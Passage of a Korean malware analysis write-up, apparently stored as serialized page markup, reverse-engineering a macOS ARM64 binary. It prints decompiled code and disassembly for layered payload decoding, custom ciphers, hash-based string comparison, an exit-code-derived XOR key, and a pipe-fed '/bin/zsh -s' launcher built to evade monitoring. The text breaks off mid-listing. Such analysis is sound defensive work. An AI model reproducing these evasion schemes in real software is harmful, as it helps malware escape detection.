=\n(",[1706,13890,13867],{"style":13574},")((",[1706,13893,13585],{"style":13574},")(puVar4",[1706,13896,13897,13898],{},"-",[1706,13899,13863],{"style":13598}," * ",[1706,13902,13903],{"style":13598},"3"," ^ puVar4",[1706,13906,13897,13907],{},[1706,13908,13909],{"style":13598},"2",") >> (*puVar4 & ",[1706,13912,13913],{"style":13598},"0x1f",")) - (",[1706,13916,13867],{"style":13574},")puVar4",[1706,13919,13920],{},[1706,13921,13922],{"style":13598},"-1",";\nlVar3 = lVar3 + ",[1706,13925,13863],{"style":13598},";\npuVar4 = puVar4 + ",[1706,13928,13903],{"style":13598},"; ",[1706,13931,13932],{"style":13565},"// advance 12 bytes — next triplet","\n} ",[1706,13935,13936],{"style":13574},"while"," (lVar3 != ",[1706,13939,13831],{"style":13598},[1706,13941,13942],{"style":13565},"// loop exactly 60 times",[723,13944],{},[1706,13946,13947],{"style":13578},"operator_delete","(pvVar2);\n",[1706,13950,13627],{"style":13574},[526,13952,13953],{},"다음은 대응하는 ARM64 어셈블리로, 각 명령어가 공식의 연산 하나에 직접 대응합니다:",[853,13955,13956],{"style":13126},[615,13957,13960],{"className":13958,"code":13959,"language":620},[618],"100087c48:  add x9,x20,#0x8\n100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11\n100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n                                       ; (compiler avoids MUL instruction)\n100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a\n100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12\n100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved\n100087c60:  sub w10,w10,w11           ; subtract b — final decoded character\n100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer\n100087c78:  add x8,x8,#0x1\n100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60\n100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded\n",[578,13961,13959],{"__ignoreMap":530},[526,13963,13964,13965,4688,13968,13971],{},"주목할 점은 곱셈 ",[578,13966,13967],{},"b × 3",[578,13969,13970],{},"add w12, w11, w11, LSL #1","로, 즉 곱셈 명령어를 완전히 피하는 시프트 앤 애드(shift-and-add)로 구현되어 있다는 것입니다. 이는 고전적인 컴파일러 최적화이면서, 동시에 시그니처 매칭으로 코드를 찾아내기 어렵게 만듭니다.",[526,13973,13974],{},"전체 디코딩 공식:",[853,13976,13977],{"style":13126},[615,13978,13981],{"className":13979,"code":13980,"language":620},[618],"char = ASR( (b × 3) XOR a, shift ) − b\n",[578,13982,13980],{"__ignoreMap":530},[526,13984,13985,13988,13989,13992,13993,13996],{},[578,13986,13987],{},"ASR","(산술 오른쪽 시프트)는 결정적으로 중요합니다. 부호 비트를 보존하기 때문입니다. ",[578,13990,13991],{},"(b×3) XOR a","의 중간 결과가 음수일 때, 이는 자주 일어나는데, 논리 시프트를 쓰면 전혀 다른 결과가 나옵니다. 이는 의도된 것입니다. 이 공식을 고급 프로그래밍 언어에서 ",[578,13994,13995],{},">>","로 다시 구현하는 사람은 부호 있는 산술을 명시적으로 고려하지 않는 한 조용히 잘못된 출력을 얻게 됩니다.",[526,13998,13999,14000,14002,14003,14006,14007,14009],{},"56자 변형인 ",[578,14001,13760],{},"은 구조적으로 동일하며, ",[578,14004,14005],{},"0x38","의 루프 한계로 ",[578,14008,13764],{},"를 대상으로 작동합니다. 두 함수 모두 이번 분석 중 Ghidra에서 실시간으로 확인했습니다.",[13095,14011],{},[888,14013,14015],{"id":14014},"계층-2-헥스-문자열-인코딩","계층 2: 헥스 문자열 인코딩",[526,14017,894],{},[526,14019,14020,14021,14024,14025,14028,14029,14032,14033,14036],{},"계층 1이 생성한 원시 바이트는 그 자체가 이진 데이터가 아니라 ASCII 헥스 문자입니다. 계층 1 트리플렛 디코드의 출력은 헥스 쌍으로 이루어진 문자열입니다: ",[578,14022,14023],{},"32694e5462...",". 이는 ",[578,14026,14027],{},"0x100000dc0","에 있는 디코더 함수 ",[578,14030,14031],{},"FUN_100000dc0","에서 확인되며, 이 함수는 ",[578,14034,14035],{},"DAT_1007bb591","에 있는 룩업 테이블을 통한 헥스 디코드를 구현합니다.",[526,14038,14039,14040,13897,14043,646,14046,13897,14049,646,14052,13897,14055,14058],{},"Ghidra 디컴파일 결과는 각 헥스 문자(",[578,14041,14042],{},"0x30",[578,14044,14045],{},"0x39",[578,14047,14048],{},"0x41",[578,14050,14051],{},"0x46",[578,14053,14054],{},"0x61",[578,14056,14057],{},"0x66",")를 해당 니블(nibble) 값으로 매핑하고 출력 바이트를 한 번에 두 문자씩 조립하는 switch 문을 보여줍니다:",[853,14060,14061],{"style":13126},[13561,14062,14063,14066,14069,14072,14073,14076,14077,14079,14080,3282,14083,1001,14085,14088,14089,4706,14092,3282,14094,14097,14098,13929,14101,14103,14104,4706,14107,3282,14109,14097,14112,13929,14115,14103,14117,4706,14120,4706,14123,3282,14125,1001,14127,3282,14129,14097,14131,13929,14134,14136,14137,4706,14140,3282,14142,1001,14145,3282,14147,14097,14150,13929,14153,14136,14155,4706,14158,3282,14160,1001,14163,3282,14165,14168,14169,13929,14172,14136,14174,4706,14177,3282,14179,1001,14182,3282,14184,14187,14188,13929,14191,14136,14193,4706,14196,3282,14198,1001,14201,3282,14203,14097,14206,13929,14209,14136,14211,4706,14214,3282,14216,1001,14218,3282,14220,14097,14222,13929,14225,14136,14227,14230,14231,14234,14235,14076,14238,14240,14241,14243,14244,14247],{},[1706,14064,14065],{"style":13565},"// FUN_100000dc0 @ 0x100000dc0",[1706,14067,14068],{"style":13565},"// Hex decoder, processes input two characters per output byte",[1706,14070,14071],{"style":13574},"switch","(*(",[1706,14074,14075],{"style":13574},"undefined1"," *)((",[1706,14078,13784],{"style":13574},")plVar2 + lVar7)) {\n  ",[1706,14081,14082],{"style":13574},"case",[1706,14084,14042],{"style":13598},[1706,14086,14087],{"style":13574},"break",";                  ",[1706,14090,14091],{"style":13565},"// '0' → 0x00",[1706,14093,14082],{"style":13574},[1706,14095,14096],{"style":13598},"0x31",": bVar9 = ",[1706,14099,14100],{"style":13598},"0x10",[1706,14102,14087],{"style":13574},";   ",[1706,14105,14106],{"style":13565},"// '1' → 0x10",[1706,14108,14082],{"style":13574},[1706,14110,14111],{"style":13598},"0x32",[1706,14113,14114],{"style":13598},"0x20",[1706,14116,14087],{"style":13574},[1706,14118,14119],{"style":13565},"// '2' → 0x20",[1706,14121,14122],{"style":13565},"// ... '3' through '9' ...",[1706,14124,14082],{"style":13574},[1706,14126,14048],{"style":13598},[1706,14128,14082],{"style":13574},[1706,14130,14054],{"style":13598},[1706,14132,14133],{"style":13598},"0xa0",[1706,14135,14087],{"style":13574},";  ",[1706,14138,14139],{"style":13565},"// 'A'/'a' → 0xa0",[1706,14141,14082],{"style":13574},[1706,14143,14144],{"style":13598},"0x42",[1706,14146,14082],{"style":13574},[1706,14148,14149],{"style":13598},"0x62",[1706,14151,14152],{"style":13598},"0xb0",[1706,14154,14087],{"style":13574},[1706,14156,14157],{"style":13565},"// 'B'/'b' → 0xb0",[1706,14159,14082],{"style":13574},[1706,14161,14162],{"style":13598},"0x43",[1706,14164,14082],{"style":13574},[1706,14166,14167],{"style":13598},"99",":   bVar9 = ",[1706,14170,14171],{"style":13598},"0xc0",[1706,14173,14087],{"style":13574},[1706,14175,14176],{"style":13565},"// 'C'/'c' → 0xc0",[1706,14178,14082],{"style":13574},[1706,14180,14181],{"style":13598},"0x44",[1706,14183,14082],{"style":13574},[1706,14185,14186],{"style":13598},"100",":  bVar9 = ",[1706,14189,14190],{"style":13598},"0xd0",[1706,14192,14087],{"style":13574},[1706,14194,14195],{"style":13565},"// 'D'/'d' → 0xd0",[1706,14197,14082],{"style":13574},[1706,14199,14200],{"style":13598},"0x45",[1706,14202,14082],{"style":13574},[1706,14204,14205],{"style":13598},"0x65",[1706,14207,14208],{"style":13598},"0xe0",[1706,14210,14087],{"style":13574},[1706,14212,14213],{"style":13565},"// 'E'/'e' → 0xe0",[1706,14215,14082],{"style":13574},[1706,14217,14051],{"style":13598},[1706,14219,14082],{"style":13574},[1706,14221,14057],{"style":13598},[1706,14223,14224],{"style":13598},"0xf0",[1706,14226,14087],{"style":13574},[1706,14228,14229],{"style":13565},"// 'F'/'f' → 0xf0","\n}\n",[1706,14232,14233],{"style":13565},"// Second nibble from lookup table at DAT_1007bb591","\n*(",[1706,14236,14237],{"style":13574},"byte",[1706,14239,13784],{"style":13574},")pppppppuVar3 + uVar8) =\n    (&DAT_1007bb591)[(",[1706,14242,13615],{"style":13574},")uVar4 & ",[1706,14245,14246],{"style":13598},"0xff","] | bVar9;\n",[526,14249,14250],{},"ARM64 어셈블리는 이를 보조 계산 분기 테이블로 구동하며, 사실상 switch를 위한 55개 항목의 점프 테이블을 구현합니다:",[853,14252,14253],{"style":13126},[615,14254,14257],{"className":14255,"code":14256,"language":620},[618],"100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table\n100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char\n100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address\n100000e68:  br x17                   ; jump — second computed branch in 24 bytes\n",[578,14258,14256],{"__ignoreMap":530},[526,14260,14261],{},"24바이트 구간 안에 두 개의 계산된 분기가 있습니다. 두 분기 목표 모두 분석 시점에 알 수 없기 때문에, 정적 분석 도구는 이 패턴을 제대로 처리하지 못합니다.",[526,14263,14264],{},"137,208자 길이의 헥스 문자열은 디코딩 후 68,604바이트가 되며, 이는 계층 3으로 입력됩니다.",[13095,14266],{},[888,14268,14270],{"id":14269},"계층-3-사용자-정의-16심볼-니블-알파벳","계층 3: 사용자 정의 16심볼 니블 알파벳",[526,14272,894],{},[526,14274,14275],{},"계층 2에서 나온 68,604개의 출력 바이트는 서로 떨어진 두 개의 ASCII 구간에서 나온 16개의 고유한 바이트 값만 사용합니다:",[630,14277,14278,14321],{},[633,14279,14280,14283,14284,646,14287,646,14290,646,14293,646,14296,646,14298,646,14301,646,14304,646,14306,646,14308,646,14311,646,14313,646,14315,646,14317,646,14319],{},[578,14281,14282],{},"0x20-0x2F",": 공백, ",[578,14285,14286],{},"!",[578,14288,14289],{},"\"",[578,14291,14292],{},"#",[578,14294,14295],{},"$",[578,14297,4024],{},[578,14299,14300],{},"&",[578,14302,14303],{},"'",[578,14305,3219],{},[578,14307,2040],{},[578,14309,14310],{},"*",[578,14312,3763],{},[578,14314,10755],{},[578,14316,13897],{},[578,14318,2147],{},[578,14320,6522],{},[633,14322,14323,1001,14326,646,14329,646,14332,646,14335,646,14338,646,14341,646,14344,14347],{},[578,14324,14325],{},"0x78-0x7F",[578,14327,14328],{},"x",[578,14330,14331],{},"y",[578,14333,14334],{},"z",[578,14336,14337],{},"{",[578,14339,14340],{},"|",[578,14342,14343],{},"}",[578,14345,14346],{},"~",", DEL",[526,14349,14350],{},"이는 의도적인 설계 결정입니다. 헥스 편집기에서 이 바이트들은 공백, 문장 부호, ASCII 경계 문자처럼 보이며, 메타데이터나 패딩처럼 여겨지는 잡음 속에 묻힙니다. 헥스 덤프를 훑어보는 분석가는 이 바이트 구간을 의심스러운 것으로 표시하지 않으며, 바이트 분포가 무작위로 보이지 않기 때문에 표준 엔트로피 분석은 실제 엔트로피를 과소평가합니다.",[526,14352,14353,14354,14357,14358,14361,14362,14365,14366,14369],{},"이 알파벳의 각 바이트는 실제 페이로드의 니블 하나를 인코딩합니다. 알파벳-니블 매핑은 우리가 ",[578,14355,14356],{},"0x100000d60","에서 확인한 인코드/디코드 함수 ",[578,14359,14360],{},"FUN_100000d60","이 적용합니다. 이 함수는 두 개의 하위 함수를 연결합니다. ",[578,14363,14364],{},"FUN_100000b50","은 입력 문자열의 문자들에 대한 인덱싱된 맵을 만들고, ",[578,14367,14368],{},"FUN_100000c34","는 이 맵을 순회하며 단계마다 6비트를 소비하고 출력 바이트를 8비트씩 누적합니다:",[853,14371,14372],{"style":13126},[13561,14373,14374,14377,14378,3467,14380,14382,14383,14385,14386,14389,14390,4706,14393,14395,14396,14398,14399,4711,14402,14404,14405,14408,14409,14411,14412,4711,14415,14417,14418,14421,14422,14425,14426,14428,14429,14432,14433,14435,14436,14076,14439,14441,14442,14444,14445,14447],{},[1706,14375,14376],{"style":13565},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[1706,14379,13834],{"style":13598},[1706,14381,13852],{"style":13574}," {\n  local_52 = *(",[1706,14384,14075],{"style":13574}," *)puVar4;\n  lVar3 = ",[1706,14387,14388],{"style":13578},"FUN_1000a078c","(param_3, &local_52);  ",[1706,14391,14392],{"style":13565},"// look up nibble value",[1706,14394,13859],{"style":13574}," (lVar3 == ",[1706,14397,13834],{"style":13598},") {\n    ",[1706,14400,14401],{"style":13565},"// character not in alphabet, treat as raw",[1706,14403,14388],{"style":13578},"(param_3, &local_51);\n  } ",[1706,14406,14407],{"style":13574},"else"," {\n    iVar5 = iVar5 + ",[1706,14410,13619],{"style":13598},";           ",[1706,14413,14414],{"style":13565},"// accumulate 4 bits",[1706,14416,13936],{"style":13574}," (",[1706,14419,14420],{"style":13598},"7"," \u003C iVar5) {\n      std::string::",[1706,14423,14424],{"style":13578},"push_back","((",[1706,14427,13867],{"style":13574},")param_1);  ",[1706,14430,14431],{"style":13565},"// emit byte when 8+ bits ready","\n      iVar5 = iVar5 + -",[1706,14434,13849],{"style":13598},";\n    }\n  }\n  puVar4 = (",[1706,14437,14438],{"style":13574},"undefined8",[1706,14440,13784],{"style":13574},")puVar4 + ",[1706,14443,13863],{"style":13598},");\n} ",[1706,14446,13936],{"style":13574}," (puVar4 != puVar1);\n",[526,14449,14450],{},"이 과정에서 나온 34,302바이트는 99.7%가 인쇄 가능한 ASCII입니다. 언뜻 훑어보면 이 단계의 페이로드는 커다란 셸 스크립트나 설정 blob처럼 보입니다.",[13095,14452],{},[888,14454,14456],{"id":14455},"계층-4-컴파일-타임-문자열-난독화","계층 4: 컴파일 타임 문자열 난독화",[526,14458,894],{},[526,14460,14461],{},"내부적으로 사용되는 문자열은 계층 1과 동일한 트리플렛 방식으로 컴파일 타임에 난독화되고, 실행 시점에 사용 직전에야 재구성됩니다. 메모리에는 필요 이상으로 오래 머물지 않으며, 버퍼는 사용 후 즉시 해제됩니다. 바이너리의 정적 데이터 섹션에는 어느 시점에도 디코딩된 문자열이 보이지 않습니다.",[526,14463,14464,14465,14468],{},"문자열 해시 함수 ",[578,14466,14467],{},"FUN_100000730","은 문자열 비교를 위한 2차 난독화 계층을 제공합니다. 문자열을 직접 비교하면 메모리에 평문이 남게 되므로, 바이너리는 대신 정수 해시를 계산해 비교합니다:",[853,14470,14471],{"style":13126},[13561,14472,14473,14476,14479,3282,14481,3219,14483,13785,14485,14487,14488,14491,14492,4706,14495,4706,14498,14501,14502,14504,14505,14507,14508,14510,14511,14136,14514,14517,14518,14520,14521,14523],{},[1706,14474,14475],{"style":13565},"// FUN_100000730 @ 0x100000730",[1706,14477,14478],{"style":13565},"// FNV-style string hash, avoids plaintext string comparisons",[1706,14480,13585],{"style":13574},[1706,14482,14467],{"style":13578},[1706,14484,13867],{"style":13574},[1706,14486,13585],{"style":13574}," iVar4 = ",[1706,14489,14490],{"style":13598},"0x19a8",";    ",[1706,14493,14494],{"style":13565},"// FNV offset basis (modified)",[1706,14496,14497],{"style":13565},"// ...",[1706,14499,14500],{"style":13574},"for"," (; uVar3 != ",[1706,14503,13834],{"style":13598},"; uVar3 = uVar3 - ",[1706,14506,13863],{"style":13598},") {\n    iVar4 = (",[1706,14509,13585],{"style":13574},")*pcVar1 + iVar4 * -",[1706,14512,14513],{"style":13598},"0x7fb91be3",[1706,14515,14516],{"style":13565},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[1706,14519,13863],{"style":13598},";\n  }\n  ",[1706,14522,13627],{"style":13574}," iVar4;\n}\n",[526,14525,14526],{},"ARM64 어셈블리는 곱셈을 fused multiply-add로 대체합니다:",[853,14528,14529],{"style":13126},[615,14530,14533],{"className":14531,"code":14532,"language":620},[618],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[578,14534,14532],{"__ignoreMap":530},[526,14536,14537],{},"이는 바이너리 내부에서 두 문자열을 비교하더라도 디버거가 문자열 수준에서 깔끔하게 잡아낼 수 있는 분기가 생기지 않고, 오직 해시 수준의 분기만 생긴다는 뜻입니다.",[13095,14539],{},[888,14541,14543],{"id":14542},"계층-5-이중-커스텀-스트림-암호-인스턴스","계층 5: 이중 커스텀 스트림 암호 인스턴스",[526,14545,894],{},[526,14547,14548,14549,14552],{},"이 지점에서 난독화 아키텍처는 이례적인 양상을 띱니다. 바이너리에서는 하나가 아니라 ",[567,14550,14551],{},"두 개의 별도 암호 인스턴스","가 실행되며, 각각 서로 다른 하드코딩된 룩업 테이블과 서로 다른 시작 카운터를 가집니다. 둘은 동일한 알고리즘 구조를 사용하지만, 페이로드 파이프라인의 서로 다른 부분을 위해 서로 다른 출력 알파벳을 생성합니다.",[526,14554,14555,646,14558,13746,14561,1201],{},[567,14556,14557],{},"인스턴스 A",[578,14559,14560],{},"0x10007ab34",[578,14562,14563],{},"FUN_10007ab34",[853,14565,14566],{"style":13126},[13561,14567,14568,14571,14572,3467,14575,14577,14578,14076,14580,14582,14583,14585,14586,14076,14588,14590,14591,14593,14594,14076,14596,14598,14599,14601,14602,14605,14606,14608,14609,14611],{},[1706,14569,14570],{"style":13565},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[1706,14573,14574],{"style":13598},"0x4c",[1706,14576,13852],{"style":13574}," {\n  bVar2 = *(",[1706,14579,14237],{"style":13574},[1706,14581,13784],{"style":13574},")local_e0 +\n          ((",[1706,14584,13615],{"style":13574},")(*(",[1706,14587,14237],{"style":13574},[1706,14589,13784],{"style":13574},")local_c8 + uVar5) ^ uVar6) & ",[1706,14592,14246],{"style":13598},"));\n  *(",[1706,14595,14237],{"style":13574},[1706,14597,13784],{"style":13574},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[1706,14600,13585],{"style":13574},")uVar5 + (uVar6 ^ bVar2);  ",[1706,14603,14604],{"style":13565},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[1706,14607,13863],{"style":13598},";\n} ",[1706,14610,13936],{"style":13574}," (uVar7 != uVar5);\n",[526,14613,14614,646,14617,13746,14620,1201],{},[567,14615,14616],{},"인스턴스 B",[578,14618,14619],{},"0x10007a7e0",[578,14621,14622],{},"FUN_10007a7e0",[853,14624,14625],{"style":13126},[13561,14626,14627,14571,14630,3467,14633,14577,14635,14076,14637,14639,14640,14585,14642,14076,14644,14646,14647,14593,14649,14076,14651,14598,14653,14601,14655,14605,14658,14608,14660,14611],{},[1706,14628,14629],{"style":13565},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[1706,14631,14632],{"style":13598},"0x9f",[1706,14634,13852],{"style":13574},[1706,14636,14237],{"style":13574},[1706,14638,13784],{"style":13574},")local_c0 +\n          ((",[1706,14641,13615],{"style":13574},[1706,14643,14237],{"style":13574},[1706,14645,13784],{"style":13574},")local_a8 + uVar5) ^ uVar6) & ",[1706,14648,14246],{"style":13598},[1706,14650,14237],{"style":13574},[1706,14652,13784],{"style":13574},[1706,14654,13585],{"style":13574},[1706,14656,14657],{"style":13565},"// identical counter update formula",[1706,14659,13863],{"style":13598},[1706,14661,13936],{"style":13574},[526,14663,14664,14665,14667,14668,14670],{},"알고리즘은 구조적으로 동일하지만 시작 카운터가 다르고(",[578,14666,14574],{}," 대 ",[578,14669,14632],{},") 룩업 테이블도 서로 다른 메모리 주소에 위치합니다. 인스턴스 A는 첫 번째 페이로드 경로를 위한 인코딩 알파벳을 생성하기 위해 상태 머신의 상태 11에서 호출됩니다. 인스턴스 B는 커다란 셸 스크립트 페이로드의 디코드를 위한 알파벳을 생성하기 위해 상태 6에서 호출됩니다.",[526,14672,14673,14674,14677,14678,14681,14682,14685],{},"정확히 말하면 이것은 ",[567,14675,14676],{},"카운터 의존적 인덱스를 갖는 치환 암호","입니다. 각 출력 바이트는 인덱스가 ",[578,14679,14680],{},"(input_byte XOR counter) & 0xFF","인 테이블 룩업입니다. 카운터는 각 바이트 이후 ",[578,14683,14684],{},"counter = (i + (counter XOR output)) & 0xFF","로 갱신되며, 이는 각 출력 바이트가 다음 룩업 인덱스의 결정에 영향을 준다는 뜻입니다. 이로써 전체 출력 시퀀스에 걸친 의존성 체인이 만들어집니다. 바이트 N은 바이트 0부터 N-1까지를 올바르게 복호화하지 않으면 복호화할 수 없습니다. 이 때문에 부분 복호화나 오류 분석이 상당히 어려워집니다.",[526,14687,14688],{},"두 인스턴스 모두 표준 RC4가 아닙니다. S-박스 초기화 단계도, S-박스 교환(swap) 연산도 없습니다. 룩업 테이블은 컴파일 타임에 내장된 정적 상수입니다.",[13095,14690],{},[888,14692,14694],{"id":14693},"계층-6-종료-코드에-의존하는-키를-사용하는-런타임-xor","계층 6: 종료 코드에 의존하는 키를 사용하는 런타임 XOR",[526,14696,894],{},[526,14698,14699,14700,14703],{},"마지막이자 분석적으로 가장 까다로운 계층은 2단계 페이로드에 in-place XOR 변환을 적용합니다. XOR 키는 하드코딩되어 있지 않고 ",[567,14701,14702],{},"첫 번째 셸 페이로드 실행","의 종료 코드에서 실행 시점에 유도되므로, 원리상 정적 분석으로는 결정할 수 없습니다. 키가 존재하려면 바이너리가 실제로 실행되어 첫 번째 셸 스크립트가 끝까지 돌아야 합니다.",[526,14705,14706],{},"ARM64 상태 머신 디스패처 내의 키 유도 시퀀스:",[853,14708,14709],{"style":13126},[615,14710,14713],{"className":14711,"code":14712,"language":620},[618],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[578,14714,14712],{"__ignoreMap":530},[526,14716,14717],{},"2단계 페이로드를 처리하는 XOR 루프:",[853,14719,14720],{"style":13126},[615,14721,14724],{"className":14722,"code":14723,"language":620},[618],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[578,14725,14723],{"__ignoreMap":530},[526,14727,14728,14729,14732,14733,14736,14737,14739],{},"이 키는 16비트 값으로, 첫 번째 셸 페이로드의 종료 상태 바이트에서 유도되어 ",[578,14730,14731],{},"0x7f0","을 곱한 뒤 상태 머신의 기준 카운터 레지스터 ",[578,14734,14735],{},"w26","의 현재 값에 더해집니다. 곱셈 상수 ",[578,14738,14731],{},"은 종료 코드의 단일 비트 차이가 완전히 다른 키를 만들어내게 합니다. 인접한 키 값 사이에는 악용할 수 있는 연속성이 없습니다.",[526,14741,14742],{},"바이너리를 통제된 환경에서 실행하여 첫 번째 셸 페이로드의 정확한 종료 코드를 기록하지 않으면, 2단계 페이로드는 정적 분석에 대해 영구적으로 불투명하게 남습니다. 이것이 전체 분석에서 가장 어려운 관문이었습니다.",[13095,14744],{},[740,14746,14748],{"id":14747},"셸-실행-인자-대신-파이프-그리고-simd-xor","셸 실행: 인자 대신 파이프, 그리고 SIMD XOR",[526,14750,746],{},[526,14752,14753,14756,14757,14760],{},[578,14754,14755],{},"0x10000091c","에 있는 셸 실행 함수 ",[578,14758,14759],{},"FUN_10000091c","은 이 바이너리에서 아키텍처적으로 가장 흥미로운 구성 요소입니다. 여기서 모든 것이 한데 모입니다. 디코딩된 페이로드, 난독화된 명령 이름, 그리고 명시적인 안티 포렌식 설계가 그것입니다. 이 함수의 모든 설계 결정은 특정한 회피 목적을 지향합니다.",[888,14762,14764],{"id":14763},"_1단계-명령-이름은-결코-평문으로-나타나지-않는다","1단계: 명령 이름은 결코 평문으로 나타나지 않는다",[526,14766,894],{},[526,14768,14769,14772,14773,14776,14777,14780,14781,14784],{},[578,14770,14771],{},"/bin/zsh","는 바이너리 어디에도 평문으로 존재하지 않습니다. ",[578,14774,14775],{},"0x1007bb5c8","의 ",[578,14778,14779],{},"__cstring"," 섹션에는 이 문자열이 난독화된 바이트 ",[578,14782,14783],{},"\\x01LG@\\x01T]F","로 들어 있습니다. 디코딩은 실행 시점에 단일 XOR 연산으로 이루어지며, ARM64 어셈블리에서 직접 검증할 수 있습니다:",[853,14786,14787],{"style":13126},[615,14788,14791],{"className":14789,"code":14790,"language":620},[618],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[578,14792,14790],{"__ignoreMap":530},[526,14794,14795,14796,14799,14800,14802,14803,14806],{},"XOR 키는 ",[578,14797,14798],{},"0x2e",", 즉 ",[578,14801,2147],{},"(마침표)의 ASCII 값입니다. 디코딩은 단일 ",[578,14804,14805],{},"eor v0.8B, v0.8B, v1.8B"," 명령으로 이루어지는데, 이는 8바이트 전체를 동시에 XOR하는 ARM64 NEON 벡터 명령입니다. 단순한 8바이트 디코드에 SIMD 명령을 사용하는 것은 이례적이며 두 가지 효과가 있습니다. 바이트 단위 루프보다 빠르고, 생성되는 명령 패턴이 시그니처 매칭 도구가 학습한 스칼라 디코드 루프와 근본적으로 다릅니다.",[526,14808,14809,14810,646,14813,646,14816,646,14819,14822,14823,14826],{},"검증은 간단합니다. ",[578,14811,14812],{},"0x01 XOR 0x2e = 0x2f = /",[578,14814,14815],{},"0x4c XOR 0x2e = 0x62 = b",[578,14817,14818],{},"0x47 XOR 0x2e = 0x69 = i",[578,14820,14821],{},"0x40 XOR 0x2e = 0x6e = n",", 즉 첫 네 바이트가 ",[578,14824,14825],{},"/bin","이 됩니다.",[888,14828,14830],{"id":14829},"_2단계-파이프-아키텍처","2단계: 파이프 아키텍처",[526,14832,894],{},[526,14834,14835],{},"명령 이름을 디코딩한 뒤, 함수는 OS 파이프를 만들고 fork합니다:",[853,14837,14838],{"style":13126},[615,14839,14842],{"className":14840,"code":14841,"language":620},[618],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[578,14843,14841],{"__ignoreMap":530},[526,14845,14846],{},"자식 프로세스에서:",[853,14848,14849],{"style":13126},[615,14850,14853],{"className":14851,"code":14852,"language":620},[618],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[578,14854,14852],{"__ignoreMap":530},[526,14856,14857,14858,14861,14862,14865,14866,14868],{},"자식 프로세스는 자신의 표준 입력을 파이프의 읽기 끝으로 대체하고 ",[578,14859,14860],{},"/bin/zsh -s","를 시작합니다. ",[578,14863,14864],{},"-s"," 모드에서 셸은 stdin에서 명령을 읽습니다. 프로세스 모니터링 도구에게 이 프로세스는 인자 없는 ",[578,14867,14860],{},"로 보이며, 정상적인 대화형 셸 세션과 구별되지 않습니다.",[888,14870,14872],{"id":14871},"_3단계-가변-크기-청크-쓰기","3단계: 가변 크기 청크 쓰기",[526,14874,894],{},[526,14876,14877],{},"부모 프로세스는 복호화된 페이로드를 의도적으로 변화하는 청크 크기로 파이프의 쓰기 끝에 씁니다:",[853,14879,14880],{"style":13126},[615,14881,14884],{"className":14882,"code":14883,"language":620},[618],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance 